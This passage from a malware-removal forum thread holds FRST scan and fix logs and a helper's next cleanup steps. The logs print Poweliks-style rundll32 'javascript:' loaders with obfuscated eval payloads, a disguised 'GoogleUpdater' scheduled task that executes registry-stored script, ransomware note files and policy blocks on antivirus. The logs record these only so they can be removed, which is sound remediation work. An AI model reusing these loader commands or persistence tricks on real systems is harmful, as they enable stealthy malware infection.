2015-07-10 18:04 - 2014-11-21 05:16 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2015-07-10 15:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Registration
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RSD C:\WINDOWS\Media
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RHD C:\Users\Public\Libraries
2015-07-10 14:54 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2015-07-10 14:54 - 2013-04-23 03:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Communication and Chat
2015-07-10 14:54 - 2013-04-23 03:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink LabelPrint
2015-07-10 14:54 - 2013-04-23 03:23 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2015-07-10 14:54 - 2012-08-17 14:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-07-10 14:54 - 2012-08-17 14:13 - 00000000 ____D C:\WINDOWS\en
2015-07-10 14:54 - 2012-08-17 14:12 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live
2015-07-10 14:53 - 2013-08-22 11:37 - 00005217 _____ C:\WINDOWS\DtcInstall.log
2015-07-10 14:53 - 2012-07-26 01:37 - 00000000 ____D C:\Users\Default.migrated
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\WCN
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\system32\WCN
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\migwiz
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\spool
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\IME
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\SysWOW64\SMI
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-07-10 14:52 - 2013-04-23 03:06 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2015-07-10 14:52 - 2012-08-17 14:07 - 00000000 ____D C:\WINDOWS\SysWOW64\Adobe
2015-07-10 14:50 - 2013-08-22 11:43 - 00000000 ____D C:\WINDOWS\DigitalLocker
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Help
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2015-07-10 14:50 - 2012-08-03 18:29 - 00000000 ____D C:\ProgramData\PRICache
2015-07-10 14:46 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\Recovery
2015-07-10 14:14 - 2013-08-22 09:36 - 00000000 __RHD C:\Users\Default
2015-07-10 13:48 - 2013-06-06 20:03 - 02013866 _____ C:\WINDOWS\WindowsUpdate (1).log
2015-07-10 10:22 - 2012-07-26 04:12 - 00000000 ____D C:\WINDOWS\AUInstallAgent
2015-07-06 16:41 - 2015-06-21 01:14 - 00000000 ____D C:\Users\Public\Downloads\Norton
2015-07-03 08:43 - 2013-07-17 21:58 - 130333168 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
 
Some files in TEMP:
====================
C:\Users\Richie\AppData\Local\Temp\avgnt.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-07-28 16:17
 
==================== End of log ============================
 
 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:28-07-2015
Ran by Richie (2015-07-29 17:51:12) Run:1
Running from C:\Users\Richie\Desktop
Loaded Profiles: Richie (Available Profiles: Richie)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CloseProcesses:
EmptyTemp:
 
HKLM-x32\...\Run: [{b090579d-244c-e682-7cd6-e6daa5c7aff0}] => "C:\ProgramData\Microsoft\{b090579d-244c-e682-7cd6-e6daa5c7aff0}\{b090579d-244c-e682-7cd6-e6daa5c7aff0}.exe"
HKLM Group Policy restriction on software: C:\Program Files\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\Run: [ivijios] => rundll32 "C:\Users\Richie\AppData\Local\ivijios.dll",ivijios <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{eedc51b2-9627-4964-8aab-3c12119ef845} <======= ATTENTION (Policy restriction on IP)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...d={searchTerms}
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...d={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...d={searchTerms}
2015-07-17 10:59 - 2015-07-17 10:59 - 00266240 _____ C:\Users\Richie\AppData\Roaming\7afd7914.dll
2015-07-14 08:21 - 2015-07-20 08:35 - 00000000 ___HD C:\7afd7914
2015-07-13 15:33 - 2015-07-13 15:33 - 00000000 ____D C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F}
2015-07-10 15:34 - 2015-07-28 13:17 - 00000000 ____D C:\Users\Richie\AppData\Local\{beedd195-7534-c93e-bcaf-0a2671d4725d}
2015-07-10 15:34 - 2015-07-10 15:34 - 00000000 ___HD C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}
2015-07-28 13:17 - 2014-12-06 22:56 - 00000000 ____D C:\ProgramData\LeboBukmo
2015-07-28 13:17 - 2014-11-26 00:56 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate
2015-07-28 13:17 - 2014-11-21 00:32 - 00000000 ____D C:\ProgramData\IomuTdilf
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate7
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\XesviPteyu
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\IojdOnyo
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\XiboHbik
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\EoxoKazxa
2015-07-28 13:17 - 2014-11-07 20:16 - 00000000 ____D C:\ProgramData\RogoLatk
2015-07-28 13:17 - 2014-11-07 20:15 - 00000000 ____D C:\ProgramData\BoweCpeb
2015-07-28 11:47 - 2014-11-05 01:20 - 00000000 ____D C:\ProgramData\HezagTonag
2015-07-10 14:50 - 2013-06-06 20:07 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services
2015-07-10 14:50 - 2012-08-17 14:05 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection
2015-07-08 07:59 - 2014-12-13 10:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Ecidcuo
2015-07-08 07:59 - 2014-12-06 22:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Evcoguyl
2015-07-08 07:59 - 2014-11-21 00:33 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Urablax
2015-07-17 10:59 - 2015-07-17 10:59 - 0266240 _____ () C:\Users\Richie\AppData\Roaming\7afd7914.dll
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2015-01-29 00:25 - 2015-01-29 00:25 - 0008528 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-29 00:25 - 2015-01-29 00:25 - 0045533 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-29 00:25 - 2015-01-29 00:25 - 0004204 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT
2015-01-29 00:25 - 2015-01-29 00:25 - 0000272 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL
2014-11-11 19:24 - 2014-11-11 19:24 - 0000448 ____H () C:\Users\Richie\AppData\Roaming\麽鎒駓覜
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.URL
2015-01-29 00:24 - 2015-01-29 00:24 - 0008528 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.HTML
2015-01-29 00:24 - 2015-01-29 00:24 - 0045533 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.PNG
2015-01-29 00:24 - 2015-01-29 00:24 - 0004204 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.TXT
2015-01-29 00:24 - 2015-01-29 00:24 - 0000272 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.URL
2014-11-11 19:24 - 2015-01-28 23:26 - 0000664 _____ () C:\ProgramData\@system.temp
2014-11-11 19:25 - 2015-01-28 23:27 - 0000400 ____H () C:\ProgramData\@system3.att
CustomCLSID: HKU\S-1-5-21-2321640021-2341620851-140482586-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: {42606C78-3E7A-474E-9FB5-D30D039784CB} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {F5715D4F-B262-4590-8487-ACEB028F19D5} - System32\Tasks\autochk => C:\Users\Richie\AppData\Roaming\Microsoft\Windows\IEUpdate\autochk.exe <==== ATTENTION
C:\users\richie\appdata\roaming\microsoft\windows\ieupdate
C:\users\richie\appdata\local\svcxdcl32.exe
HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll"
 
RemoveProxy:
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
*****************
 
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\{b090579d-244c-e682-7cd6-e6daa5c7aff0} => value removed successfully
HKLM => Group Policy Restriction on software restored successfully
HKLM => Group Policy Restriction on software restored successfully
"HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" => key removed successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Windows\CurrentVersion\Run\\ivijios => value removed successfully
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => key removed successfully
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => key removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\\ActivePolicy => value removed successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found. 
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found. 
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => key removed successfully
HKCR\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\Wow6432Node\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\Wow6432Node\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => key removed successfully
HKCR\Wow6432Node\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => key not found. 
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found. 
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found. 
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found. 
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => key removed successfully
HKCR\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => key not found. 
"C:\Users\Richie\AppData\Roaming\7afd7914.dll" => File/Folder not found.
C:\7afd7914 => moved successfully.
C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F} => moved successfully.
C:\Users\Richie\AppData\Local\{beedd195-7534-c93e-bcaf-0a2671d4725d} => moved successfully.
 
"C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}" folder move:
 
Could not move "C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}" => Scheduled to move on reboot.
 
C:\ProgramData\LeboBukmo => moved successfully.
C:\Users\Richie\AppData\Roaming\FrameworkUpdate => moved successfully.
C:\ProgramData\IomuTdilf => moved successfully.
C:\Users\Richie\AppData\Roaming\FrameworkUpdate7 => moved successfully.
C:\ProgramData\XesviPteyu => moved successfully.
C:\ProgramData\IojdOnyo => moved successfully.
C:\ProgramData\XiboHbik => moved successfully.
C:\ProgramData\EoxoKazxa => moved successfully.
C:\ProgramData\RogoLatk => moved successfully.
C:\ProgramData\BoweCpeb => moved successfully.
C:\ProgramData\HezagTonag => moved successfully.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services => moved successfully.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection => moved successfully.
C:\Users\Richie\AppData\Roaming\Ecidcuo => moved successfully.
C:\Users\Richie\AppData\Roaming\Evcoguyl => moved successfully.
C:\Users\Richie\AppData\Roaming\Urablax => moved successfully.
"C:\Users\Richie\AppData\Roaming\7afd7914.dll" => File/Folder not found.
C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML => moved successfully.
C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT => moved successfully.
C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.URL => moved successfully.
C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML => moved successfully.
C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.PNG => moved successfully.
C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT => moved successfully.
C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL => moved successfully.
C:\Users\Richie\AppData\Roaming\麽鎒駓覜 => moved successfully.
C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML => moved successfully.
C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT => moved successfully.
C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.URL => moved successfully.
C:\Users\Richie\AppData\Local\HELP_DECRYPT.HTML => moved successfully.
C:\Users\Richie\AppData\Local\HELP_DECRYPT.PNG => moved successfully.
C:\Users\Richie\AppData\Local\HELP_DECRYPT.TXT => moved successfully.
C:\Users\Richie\AppData\Local\HELP_DECRYPT.URL => moved successfully.
C:\ProgramData\@system.temp => moved successfully.
C:\ProgramData\@system3.att => moved successfully.
HKU\S-1-5-21-2321640021-2341620851-140482586-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{42606C78-3E7A-474E-9FB5-D30D039784CB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42606C78-3E7A-474E-9FB5-D30D039784CB}" => key removed successfully
C:\Windows\System32\Tasks\GoogleUpdater => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdater" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F5715D4F-B262-4590-8487-ACEB028F19D5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F5715D4F-B262-4590-8487-ACEB028F19D5}" => key removed successfully
C:\Windows\System32\Tasks\autochk => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\autochk" => key removed successfully
"C:\users\richie\appdata\roaming\microsoft\windows\ieupdate" => File/Folder not found.
"C:\users\richie\appdata\local\svcxdcl32.exe" => File/Folder not found.
HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}" => Error: No automatic fix found for this entry.
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Windows\CurrentVersion\Run\\HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}" => value not found.
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Windows\CurrentVersion\Run\\HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll" => value not found.
 
========= RemoveProxy: =========
 
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
 
 
========= End of RemoveProxy: =========
 
 
=========  bitsadmin /reset /allusers =========
 
 
BITSADMIN version 3.0 [ 7.7.9600 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.
 
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
 
Unable to cancel {A0B92677-F8A4-41B6-B366-76E42D108201}.
Unable to cancel {FC31FA8D-E904-4827-A396-A3C52B93D920}.
Unable to cancel {4F1920D9-CEF1-48F7-9914-C15A01665488}.
Unable to cancel {E867E1AF-1B20-47C5-B70A-856BDC49A7CB}.
Unable to cancel {1A03CCBA-B4B0-42DC-95CD-1FC92FCDF94C}.
Unable to cancel {F11AE051-05D5-4D33-97DA-3CCFD9B22E66}.
Unable to cancel {F29A5325-EA0B-4E89-BCAB-AD6D10CEC8AC}.
Unable to cancel {A70E2C99-7F91-4888-A1C8-CC273458379C}.
Unable to cancel {5D5E5EC8-1011-4069-B6AC-6AF8E75CCD3F}.
Unable to cancel {287AE5EE-FC45-42C8-9C1D-86C50EF5D7EE}.
Unable to cancel {34199713-82AE-4A8E-BE27-C39F9015664D}.
Unable to cancel {C8B2F491-B299-40E7-B87C-52AD8ADA5BC3}.
Unable to cancel {D80313B9-16BC-495F-BED8-865E2CFD11B5}.
{0F663357-8073-4A09-A7DF-4CAE8AA5D844} canceled.
{CAC120E3-7F7D-4470-96BF-480051C165BB} canceled.
Unable to cancel {7C9194B6-4FF2-45B2-881D-C4BD3FCA5BC4}.
Unable to cancel {C2BBED31-3093-4B66-9B38-9B31EC1964F5}.
2 out of 17 jobs canceled.
 
========= End of CMD: =========
 
 
=========  netsh advfirewall reset =========
 
Ok.
 
 
========= End of CMD: =========
 
 
=========  netsh advfirewall set allprofiles state ON =========
 
Ok.
 
 
========= End of CMD: =========
 
EmptyTemp: => 4.9 GB temporary data Removed.
 
Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 2015-07-29 20:39:27)<=
 
C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0} => Is moved successfully
 
==== End of Fixlog 20:39:27 ====

#4
Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts
Hi smwifey,

Did you do Step 2? The things that are in there need to be enabled before I can remove them. :) I'll just repeat that part here.
  • Step 1

    Copy and paste the following into Notepad and save as fixlist.txt to your desktop:
    2015-07-29 20:41 - 2015-07-29 20:41 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vfrrubmu.sys
    S1 vfrrubmu; C:\WINDOWS\system32\drivers\vfrrubmu.sys [55168 2015-07-29] (Microsoft Corporation)
    AlternateDataStreams: C:\WINDOWS\system32\Drivers\vfrrubmu.sys:changelist
    C:\WINDOWS\system32\Drivers\vfrrubmu.sys
    • Run your copy of FRST. It is important to ensure it is located on your desktop.
    • Press the Fix button.
    • It will produce a log (fixlog.txt) once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 2

    Download the free version of 'Malwarebytes Anti-Malware by Malwarebytes Corporation' and save it to your desktop.
    • Double-click mbam-setup-*.exe and proceed to installing the program.
      • Accept the License Agreement.
      • At the end, untick Enable free trial of Malwarebytes Anti-Malware Premium and ensure Launch Malwarebytes' Anti-Malware is checked.
      • Click Finish after.
    • Once the program has loaded, navigate to the Settings tab and select Detection and Protection.
      • Tick the Scan For Rootkits box.
    • Go back to the Dashboard and select Update Now. Click Scan Now after.
      • Updates can sometimes still be present. Be sure to select Update Now again if you are prompted.
      • Once the scan is complete, click Apply Actions.
      • If you are prompted to reboot, allow it by pressing Yes.
    • Navigate to the program's History tab to retrieve the log.
      • Click Application Logs and double-click on the most recent Scan Log.
      • Export the log to your desktop as a .TXT file.
      • You can also choose to directly copy the log by selecting Copy to Clipboard.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 3

    Download 'TDSSKiller by Kaspersky Lab ZAO' and save it to your desktop.
    • Double-click TDSSKiller.exe to run it. It will ask for administrator privileges.
    • Kindly read and Accept the next two prompts.
    • Click Start Scan to begin the scan.
      • If an infected file is detected, the default action will be Cure, click on Continue.
      • If a suspicious file is detected, the default action will be Skip, click on Continue.
    • It may ask you to reboot the computer to complete the process. If so, click on Reboot Now. If not, click Close.
    • The log will be made available at C:\TDSSKiller.*_*_*_log.txt. Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 4

    Open System Configuration by following the steps below.
    • Press the Windows and R buttons together. The Run prompt should appear.
    • Type in msconfig and press OK.
    • Navigate to the Startup tab > Enable All > Apply > OK.
